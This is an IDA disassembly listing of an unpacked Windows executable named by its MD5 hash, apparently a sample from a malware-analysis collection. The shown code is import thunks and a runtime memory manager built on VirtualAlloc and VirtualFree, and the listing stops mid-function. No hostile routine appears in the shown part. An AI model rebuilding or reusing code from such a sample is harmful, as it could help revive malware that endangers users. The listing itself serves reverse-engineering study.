;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0BBFBEE00EAE8FA419DAF1112695EC89
; File Name : u:\work\0bbfbee00eae8fa419daf1112695ec89_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0000C000 ( 49152.)
; Section size in file : 0000C000 ( 49152.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
off_401000 dd offset dword_401004 ; DATA XREF: UPX0:004093EB�r
; UPX0:00409400�r ...
dword_401004 dd 7453060Ah, 676E6972h, 401010h, 69570A0Bh, 74536564h
; DATA XREF: UPX0:off_401000�o
dd 676E6972h, 401068h, 7 dup(0)
dd offset dword_401068
dd 4, 0
dd offset loc_4029A0
dd offset nullsub_2
dd offset nullsub_3
dd offset sub_4029B4
dd offset nullsub_4
dd offset sub_4028A8
dd offset sub_4028BC
dd offset sub_4028E4
dword_401068 dd 624F5407h, 7463656Ah, 0D18C25FFh, 0C08B0040h, 0D18825FFh
; CODE XREF: UPX0:00404A01�p
; DATA XREF: UPX0:0040103C�o
dd 0C08B0040h, 0D18425FFh, 0C08B0040h, 0D18025FFh, 0C08B0040h
dd 0D17C25FFh, 0C08B0040h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401098 proc near ; CODE XREF: sub_402A4C+14�p
; sub_402A68+16�p ...
jmp ds:dword_40D178
sub_401098 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A0 proc near ; CODE XREF: sub_404820+15�p
; UPX0:0040497C�p
jmp ds:dword_40D174
sub_4010A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010A8 proc near ; CODE XREF: sub_402B34+D2�p
; UPX0:00402E3C�p
jmp ds:dword_40D170
sub_4010A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B0 proc near ; CODE XREF: UPX0:004049AF�p
jmp ds:dword_40D16C
sub_4010B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010B8 proc near ; CODE XREF: UPX0:0040495B�p
; UPX0:004049A5�p
jmp ds:dword_40D168
sub_4010B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C0 proc near ; CODE XREF: sub_402B34+6A�p
; sub_402B34+A7�p ...
jmp ds:dword_40D164
sub_4010C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010C8 proc near ; CODE XREF: sub_40484F+19�p
jmp ds:dword_40D160
sub_4010C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D0 proc near ; CODE XREF: sub_4042F8+3�p
jmp ds:dword_40D1A0
sub_4010D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010D8 proc near ; CODE XREF: sub_403090+DD�p
jmp ds:dword_40D15C
sub_4010D8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E0 proc near ; CODE XREF: sub_403090+73�p
jmp ds:dword_40D19C
sub_4010E0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010E8 proc near ; CODE XREF: sub_40430C+114�p
jmp ds:dword_40D158
sub_4010E8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F0 proc near ; CODE XREF: sub_40430C+107�p
jmp ds:dword_40D154
sub_4010F0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4010F8 proc near ; CODE XREF: sub_403090+B7�p
jmp ds:dword_40D150
sub_4010F8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401100 proc near ; CODE XREF: UPX0:004054B0�p
jmp ds:dword_40D14C
sub_401100 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401108 proc near ; CODE XREF: sub_404820:loc_404841�p
; sub_40484F:loc_404875�p ...
jmp ds:dword_40D148
sub_401108 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401110 proc near ; CODE XREF: sub_4044B4+F1�p
jmp ds:dword_40D144
sub_401110 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401118 proc near ; CODE XREF: sub_4044B4+1C�p
jmp ds:dword_40D140
sub_401118 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401120 proc near ; CODE XREF: sub_40430C+1A�p
jmp ds:dword_40D13C
sub_401120 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401128 proc near ; CODE XREF: sub_40430C+2B�p
jmp ds:dword_40D138
sub_401128 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401130 proc near ; CODE XREF: sub_4011D0+A�p
jmp ds:dword_40D134
sub_401130 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401138 proc near ; CODE XREF: sub_4044B4+EB�p
jmp ds:dword_40D130
sub_401138 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401140 proc near ; CODE XREF: sub_4044B4+163�p
; sub_4044B4+189�p ...
jmp ds:dword_40D12C
sub_401140 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401148 proc near ; CODE XREF: sub_40478C+31�p
jmp ds:dword_40D198
sub_401148 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401150 proc near ; CODE XREF: sub_40430C+5B�p
; sub_40430C+14B�p ...
jmp ds:dword_40D128
sub_401150 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401158 proc near ; CODE XREF: sub_40430C+BF�p
; sub_40430C+F4�p
jmp ds:dword_40D124
sub_401158 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401160 proc near ; CODE XREF: sub_40430C+120�p
; sub_40430C+157�p ...
jmp ds:dword_40D120
sub_401160 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401168 proc near ; CODE XREF: sub_403C30+3A�p
; sub_403C30+58�p ...
jmp ds:dword_40D11C
sub_401168 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401170 proc near ; CODE XREF: sub_4027C4+6B�p
; sub_4044B4+C6�p
jmp ds:dword_40D1B0
sub_401170 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401178 proc near ; CODE XREF: sub_4027C4+22�p
; sub_4044B4+3A�p ...
jmp ds:dword_40D1AC
sub_401178 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401180 proc near ; CODE XREF: sub_4027C4+55�p
; sub_4044B4+92�p ...
jmp ds:dword_40D1A8
sub_401180 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401188 proc near ; CODE XREF: sub_4032E0+39�p
; sub_4032E0+5F�p ...
jmp ds:dword_40D118
sub_401188 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401190 proc near ; CODE XREF: sub_4042AC+B�p
jmp ds:dword_40D114
sub_401190 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401198 proc near ; CODE XREF: sub_403C30+45�p
; sub_403C30+62�p
jmp ds:dword_40D1D0
sub_401198 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011A0 proc near ; CODE XREF: sub_403760+16�p
jmp ds:dword_40D1CC
sub_4011A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011A8 proc near ; CODE XREF: sub_403724+E�p
; sub_40373C+13�p
jmp ds:dword_40D1C8
sub_4011A8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B0 proc near ; CODE XREF: sub_403C0C+F�p
jmp ds:dword_40D1C4
sub_4011B0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011B8 proc near ; CODE XREF: sub_403CCC+3C�p
; sub_403D10+1F�p
jmp ds:dword_40D1C0
sub_4011B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C0 proc near ; CODE XREF: sub_403D10+8B�p
jmp ds:dword_40D1BC
sub_4011C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011C8 proc near ; CODE XREF: sub_403E30+41�p
; sub_403E30+8F�p
jmp ds:dword_40D1B8
sub_4011C8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011D0 proc near ; CODE XREF: UPX0:004054BA�p
var_1C = word ptr -1Ch
var_18 = word ptr -18h
push ebx
add esp, 0FFFFFFBCh
mov ebx, 0Ah
push esp
call sub_401130 ; GetStartupInfoA
test byte ptr [esp+48h+var_1C], 1
jz short loc_4011EB
movzx ebx, [esp+48h+var_18]
loc_4011EB: ; CODE XREF: sub_4011D0+14�j
mov eax, ebx
add esp, 44h
pop ebx
retn
sub_4011D0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011F4 proc near ; CODE XREF: sub_401234+13�p
; sub_4018C0+53�p
jmp ds:dword_40D110
sub_4011F4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4011FC proc near ; CODE XREF: sub_401984+3F�p
; sub_401984+9D�p
jmp ds:dword_40D10C
sub_4011FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401204 proc near ; CODE XREF: sub_4013D8+2F�p
; sub_40143C+1E�p ...
jmp ds:dword_40D108
sub_401204 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40120C proc near ; CODE XREF: sub_4013D8+56�p
; sub_40143C+69�p ...
jmp ds:dword_40D104
sub_40120C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401214 proc near ; CODE XREF: sub_4018C0+16�p
jmp ds:dword_40D100
sub_401214 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40121C proc near ; CODE XREF: sub_4018C0+29�p
; sub_401984+2D�p ...
jmp ds:dword_40D0FC
sub_40121C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_401224 proc near ; CODE XREF: sub_4018C0+B0�p
; sub_401984+C6�p ...
jmp ds:dword_40D0F8
sub_401224 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40122C proc near ; CODE XREF: sub_401984+D0�p
jmp ds:dword_40D0F4
sub_40122C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401234 proc near ; CODE XREF: sub_40128C+6�p
push ebx
push esi
mov esi, offset dword_40C454
cmp dword ptr [esi], 0
jnz short loc_40127A
push 644h
push 0
call sub_4011F4 ; LocalAlloc
mov ecx, eax
test ecx, ecx
jnz short loc_401257
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_401257: ; CODE XREF: sub_401234+1C�j
mov eax, dword_40C450
mov [ecx], eax
mov dword_40C450, ecx
xor edx, edx
loc_401266: ; CODE XREF: sub_401234+44�j
mov eax, edx
add eax, eax
lea eax, [ecx+eax*8+4]
mov ebx, [esi]
mov [eax], ebx
mov [esi], eax
inc edx
cmp edx, 64h
jnz short loc_401266
loc_40127A: ; CODE XREF: sub_401234+A�j
mov eax, [esi]
mov edx, [eax]
mov [esi], edx
pop esi
pop ebx
retn
sub_401234 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401284 proc near ; CODE XREF: sub_4018C0+33�p
; sub_4018C0+3D�p ...
mov [eax], eax
mov [eax+4], eax
retn
sub_401284 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40128C proc near ; CODE XREF: sub_4012D4+5E�p
; sub_401348+6F�p ...
push ebx
push esi
mov esi, edx
mov ebx, eax
call sub_401234
test eax, eax
jnz short loc_4012A0
xor eax, eax
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4012A0: ; CODE XREF: sub_40128C+D�j
mov edx, [esi]
mov [eax+8], edx
mov edx, [esi+4]
mov [eax+0Ch], edx
mov edx, [ebx]
mov [eax], edx
mov [eax+4], ebx
mov [edx+4], eax
mov [ebx], eax
mov al, 1
pop esi
pop ebx
retn
sub_40128C endp
; =============== S U B R O U T I N E =======================================
sub_4012BC proc near ; CODE XREF: sub_4012D4+2C�p
; sub_4012D4+49�p ...
mov edx, [eax+4]
mov ecx, [eax]
mov [edx], ecx
mov [ecx+4], edx
mov edx, dword_40C454
mov [eax], edx
mov dword_40C454, eax
retn
sub_4012BC endp
; =============== S U B R O U T I N E =======================================
sub_4012D4 proc near ; CODE XREF: sub_401680+6C�p
; sub_401710+62�p ...
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov esi, ecx
mov [esp+14h+var_14], edx
mov ebp, eax
mov ebx, [ebp+0]
mov eax, [esp+14h+var_14]
mov edx, [eax]
mov [esi], edx
mov edx, [eax+4]
mov [esi+4], edx
loc_4012F0: ; CODE XREF: sub_4012D4+58�j
mov edi, [ebx]
mov eax, [ebx+8]
mov edx, eax
add edx, [ebx+0Ch]
cmp edx, [esi]
jnz short loc_401312
mov eax, ebx
call sub_4012BC
mov eax, [ebx+8]
mov [esi], eax
mov eax, [ebx+0Ch]
add [esi+4], eax
jmp short loc_401328
; ---------------------------------------------------------------------------
loc_401312: ; CODE XREF: sub_4012D4+28�j
mov edx, [esi]
add edx, [esi+4]
cmp eax, edx
jnz short loc_401328
mov eax, ebx
call sub_4012BC
mov eax, [ebx+0Ch]
add [esi+4], eax
loc_401328: ; CODE XREF: sub_4012D4+3C�j
; sub_4012D4+45�j
mov ebx, edi
cmp ebp, ebx
jnz short loc_4012F0
mov edx, esi
mov eax, ebp
call sub_40128C
test al, al
jnz short loc_40133F
xor eax, eax
mov [esi], eax
loc_40133F: ; CODE XREF: sub_4012D4+65�j
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4012D4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_401348 proc near ; CODE XREF: sub_401834+7A�p
; sub_401C1C+8A�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebx, eax
mov edi, ebx
loc_401353: ; CODE XREF: sub_401348+84�j
mov esi, [edx]
mov eax, [ebx+8]
cmp esi, eax
jb short loc_4013C8
mov ecx, esi
add ecx, [edx+4]
mov ebp, eax
add ebp, [ebx+0Ch]
cmp ecx, ebp
ja short loc_4013C8
cmp esi, eax
jnz short loc_401389
mov eax, [edx+4]
add [ebx+8], eax
mov eax, [edx+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_4013C4
mov eax, ebx
call sub_4012BC
jmp short loc_4013C4
; ---------------------------------------------------------------------------
loc_401389: ; CODE XREF: sub_401348+24�j
mov ecx, [edx]
mov esi, [edx+4]
add ecx, esi
mov edi, eax
add edi, [ebx+0Ch]
cmp ecx, edi
jnz short loc_40139E
sub [ebx+0Ch], esi
jmp short loc_4013C4
; ---------------------------------------------------------------------------
loc_40139E: ; CODE XREF: sub_401348+4F�j
mov ecx, [edx]
add ecx, [edx+4]
mov [esp+18h+var_18], ecx
sub edi, ecx
mov [esp+18h+var_14], edi
mov edx, [edx]
sub edx, eax
mov [ebx+0Ch], edx
mov edx, esp
mov eax, ebx
call sub_40128C
test al, al
jnz short loc_4013C4
xor eax, eax
jmp short loc_4013D0
; ---------------------------------------------------------------------------
loc_4013C4: ; CODE XREF: sub_401348+36�j
; sub_401348+3F�j ...
mov al, 1
jmp short loc_4013D0
; ---------------------------------------------------------------------------
loc_4013C8: ; CODE XREF: sub_401348+12�j
; sub_401348+20�j
mov ebx, [ebx]
cmp edi, ebx
jnz short loc_401353
xor eax, eax
loc_4013D0: ; CODE XREF: sub_401348+7A�j
; sub_401348+7E�j
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401348 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4013D8 proc near ; CODE XREF: sub_401680+5C�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
cmp esi, 100000h
jge short loc_4013EE
mov esi, 100000h
jmp short loc_4013FA
; ---------------------------------------------------------------------------
loc_4013EE: ; CODE XREF: sub_4013D8+D�j
add esi, 0FFFFh
and esi, 0FFFF0000h
loc_4013FA: ; CODE XREF: sub_4013D8+14�j
mov [ebx+4], esi
push 1
push 2000h
push esi
push 0
call sub_401204 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jz short loc_401437
mov edx, ebx
mov eax, offset dword_40C458
call sub_40128C
test al, al
jnz short loc_401437
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_40120C ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_401437: ; CODE XREF: sub_4013D8+3A�j
; sub_4013D8+4A�j
pop edi
pop esi
pop ebx
retn
sub_4013D8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40143C proc near ; CODE XREF: sub_401710+4C�p
; sub_401710+93�p
push ebx
push esi
push edi
push ebp
mov ebx, ecx
mov esi, edx
mov ebp, eax
mov dword ptr [ebx+4], 100000h
push 4
push 2000h
push 100000h
push ebp
call sub_401204 ; VirtualAlloc
mov edi, eax
mov [ebx], edi
test edi, edi
jnz short loc_401486
add esi, 0FFFFh
and esi, 0FFFF0000h
mov [ebx+4], esi
push 4
push 2000h
push esi
push ebp
call sub_401204 ; VirtualAlloc
mov [ebx], eax
loc_401486: ; CODE XREF: sub_40143C+29�j
cmp dword ptr [ebx], 0
jz short loc_4014AE
mov edx, ebx
mov eax, offset dword_40C458
call sub_40128C
test al, al
jnz short loc_4014AE
push 8000h
push 0
mov eax, [ebx]
push eax
call sub_40120C ; VirtualFree
xor eax, eax
mov [ebx], eax
loc_4014AE: ; CODE XREF: sub_40143C+4D�j
; sub_40143C+5D�j
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40143C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4014B4 proc near ; CODE XREF: sub_401680+7E�p
; sub_401710+7A�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_20], ecx
mov [esp+24h+var_24], edx
mov [esp+24h+var_1C], 0FFFFFFFFh
xor edx, edx
mov [esp+24h+var_18], edx
mov ebp, eax
mov eax, [esp+24h+var_24]
add eax, ebp
mov [esp+24h+var_14], eax
mov ebx, dword_40C458
jmp short loc_401534
; ---------------------------------------------------------------------------
loc_4014E3: ; CODE XREF: sub_4014B4+86�j
mov edi, [ebx]
mov esi, [ebx+8]
cmp ebp, esi
ja short loc_401532
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_14]
ja short loc_401532
cmp esi, [esp+24h+var_1C]
jnb short loc_401501
mov [esp+24h+var_1C], esi
loc_401501: ; CODE XREF: sub_4014B4+47�j
mov eax, esi
add eax, [ebx+0Ch]
cmp eax, [esp+24h+var_18]
jbe short loc_401510
mov [esp+24h+var_18], eax
loc_401510: ; CODE XREF: sub_4014B4+56�j
push 8000h
push 0
push esi
call sub_40120C ; VirtualFree
test eax, eax
jnz short loc_40152B
mov dword_40C434, 1
loc_40152B: ; CODE XREF: sub_4014B4+6B�j
mov eax, ebx
call sub_4012BC
loc_401532: ; CODE XREF: sub_4014B4+36�j
; sub_4014B4+41�j
mov ebx, edi
loc_401534: ; CODE XREF: sub_4014B4+2D�j
cmp ebx, offset dword_40C458
jnz short loc_4014E3
mov eax, [esp+24h+var_20]
xor edx, edx
mov [eax], edx
cmp [esp+24h+var_18], 0
jz short loc_401564
mov eax, [esp+24h+var_20]
mov edx, [esp+24h+var_1C]
mov [eax], edx
mov eax, [esp+24h+var_18]
sub eax, [esp+24h+var_1C]
mov edx, [esp+24h+var_20]
mov [edx+4], eax
loc_401564: ; CODE XREF: sub_4014B4+95�j
add esp, 14h
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4014B4 endp
; =============== S U B R O U T I N E =======================================
sub_40156C proc near ; CODE XREF: sub_401680+2D�p
; sub_401710+E6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF4h
mov [esp+1Ch+var_18], ecx
mov [esp+1Ch+var_1C], edx
mov edx, eax
mov ebp, edx
and ebp, 0FFFFF000h
add edx, [esp+1Ch+var_1C]
add edx, 0FFFh
and edx, 0FFFFF000h
mov [esp+1Ch+var_14], edx
mov eax, [esp+1Ch+var_18]
mov [eax], ebp
mov eax, [esp+1Ch+var_14]
sub eax, ebp
mov edx, [esp+1Ch+var_18]
mov [edx+4], eax
mov esi, dword_40C458
jmp short loc_4015EE
; ---------------------------------------------------------------------------
loc_4015B2: ; CODE XREF: sub_40156C+88�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebp, ebx
jbe short loc_4015C0
mov ebx, ebp
loc_4015C0: ; CODE XREF: sub_40156C+50�j
cmp edi, [esp+1Ch+var_14]
jbe short loc_4015CA
mov edi, [esp+1Ch+var_14]
loc_4015CA: ; CODE XREF: sub_40156C+58�j
cmp edi, ebx
jbe short loc_4015EC
push 4
push 1000h
sub edi, ebx
push edi
push ebx
call sub_401204 ; VirtualAlloc
test eax, eax
jnz short loc_4015EC
mov eax, [esp+1Ch+var_18]
xor edx, edx
mov [eax], edx
jmp short loc_4015F6
; ---------------------------------------------------------------------------
loc_4015EC: ; CODE XREF: sub_40156C+60�j
; sub_40156C+74�j
mov esi, [esi]
loc_4015EE: ; CODE XREF: sub_40156C+44�j
cmp esi, offset dword_40C458
jnz short loc_4015B2
loc_4015F6: ; CODE XREF: sub_40156C+7E�j
add esp, 0Ch
pop ebp
pop edi
pop esi
pop ebx
retn
sub_40156C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401600 proc near ; CODE XREF: sub_401834+2E�p
var_14 = dword ptr -14h
push ebx
push esi
push edi
push ebp
push ecx
mov ebx, eax
mov esi, ebx
add esi, 0FFFh
and esi, 0FFFFF000h
mov [esp+14h+var_14], esi
mov ebp, ebx
add ebp, edx
and ebp, 0FFFFF000h
mov eax, [esp+14h+var_14]
mov [ecx], eax
mov eax, ebp
sub eax, [esp+14h+var_14]
mov [ecx+4], eax
mov esi, dword_40C458
jmp short loc_40166F
; ---------------------------------------------------------------------------
loc_401637: ; CODE XREF: sub_401600+75�j
mov ebx, [esi+8]
mov edi, [esi+0Ch]
add edi, ebx
cmp ebx, [esp+14h+var_14]
jnb short loc_401647
mov ebx, [esp+14h+var_14]
loc_401647: ; CODE XREF: sub_401600+42�j
cmp ebp, edi
jnb short loc_40164D
mov edi, ebp
loc_40164D: ; CODE XREF: sub_401600+49�j
cmp edi, ebx
jbe short loc_40166D
push 4000h
sub edi, ebx
push edi
push ebx
call sub_40120C ; VirtualFree
test eax, eax
jnz short loc_40166D
mov dword_40C434, 2
loc_40166D: ; CODE XREF: sub_401600+4F�j
; sub_401600+61�j
mov esi, [esi]
loc_40166F: ; CODE XREF: sub_401600+35�j
cmp esi, offset dword_40C458
jnz short loc_401637
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401600 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401680 proc near ; CODE XREF: sub_401E14+B�p
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov esi, edx
mov edi, eax
mov ebp, offset dword_40C468
add edi, 3FFFh
and edi, 0FFFFC000h
loc_40169C: ; CODE XREF: sub_401680+75�j
mov ebx, [ebp+0]
jmp short loc_4016D4
; ---------------------------------------------------------------------------
loc_4016A1: ; CODE XREF: sub_401680+56�j
cmp edi, [ebx+0Ch]
jg short loc_4016D2
mov ecx, esi
mov edx, edi
mov eax, [ebx+8]
call sub_40156C
cmp dword ptr [esi], 0
jz short loc_401707
mov eax, [esi+4]
add [ebx+8], eax
mov eax, [esi+4]
sub [ebx+0Ch], eax
cmp dword ptr [ebx+0Ch], 0
jnz short loc_401707
mov eax, ebx
call sub_4012BC
jmp short loc_401707
; ---------------------------------------------------------------------------
loc_4016D2: ; CODE XREF: sub_401680+24�j
mov ebx, [ebx]
loc_4016D4: ; CODE XREF: sub_401680+1F�j
cmp ebx, ebp
jnz short loc_4016A1
mov edx, esi
mov eax, edi
call sub_4013D8
cmp dword ptr [esi], 0
jz short loc_401707
mov ecx, esp
mov edx, esi
mov eax, ebp
call sub_4012D4
cmp [esp+18h+var_18], 0
jnz short loc_40169C
mov ecx, esp
mov edx, [esi+4]
mov eax, [esi]
call sub_4014B4
xor eax, eax
mov [esi], eax
loc_401707: ; CODE XREF: sub_401680+35�j
; sub_401680+47�j ...
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_401680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401710 proc near ; CODE XREF: sub_401E40+10�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFECh
mov [esp+24h+var_24], ecx
mov edi, edx
mov esi, eax
mov ebp, offset dword_40C468
add edi, 3FFFh
and edi, 0FFFFC000h
loc_40172F: ; CODE XREF: sub_401710+6C�j
; sub_401710+B3�j
mov ebx, [ebp+0]
jmp short loc_401736
; ---------------------------------------------------------------------------
loc_401734: ; CODE XREF: sub_401710+2D�j
mov ebx, [ebx]
loc_401736: ; CODE XREF: sub_401710+22�j
cmp ebx, ebp
jz short loc_40173F
cmp esi, [ebx+8]
jnz short loc_401734
loc_40173F: ; CODE XREF: sub_401710+28�j
cmp esi, [ebx+8]
jnz short loc_40179B
cmp edi, [ebx+0Ch]
jle loc_4017E3
lea ecx, [esp+24h+var_20]
mov edx, edi
sub edx, [ebx+0Ch]
mov eax, [ebx+8]
add eax, [ebx+0Ch]
call sub_40143C
cmp [esp+24h+var_20], 0
jz short loc_40179B
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_4012D4
cmp [esp+24h+var_18], 0
jnz short loc_40172F
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
call sub_4014B4
mov eax, [esp+24h+var_24]
xor edx, edx
mov [eax], edx
jmp loc_40182B
; ---------------------------------------------------------------------------
loc_40179B: ; CODE XREF: sub_401710+32�j
; sub_401710+56�j
lea ecx, [esp+24h+var_20]
mov edx, edi
mov eax, esi
call sub_40143C
cmp [esp+24h+var_20], 0
jz short loc_4017E3
lea ecx, [esp+24h+var_18]
lea edx, [esp+24h+var_20]
mov eax, ebp
call sub_4012D4
cmp [esp+24h+var_18], 0
jnz loc_40172F
lea ecx, [esp+24h+var_18]
mov edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
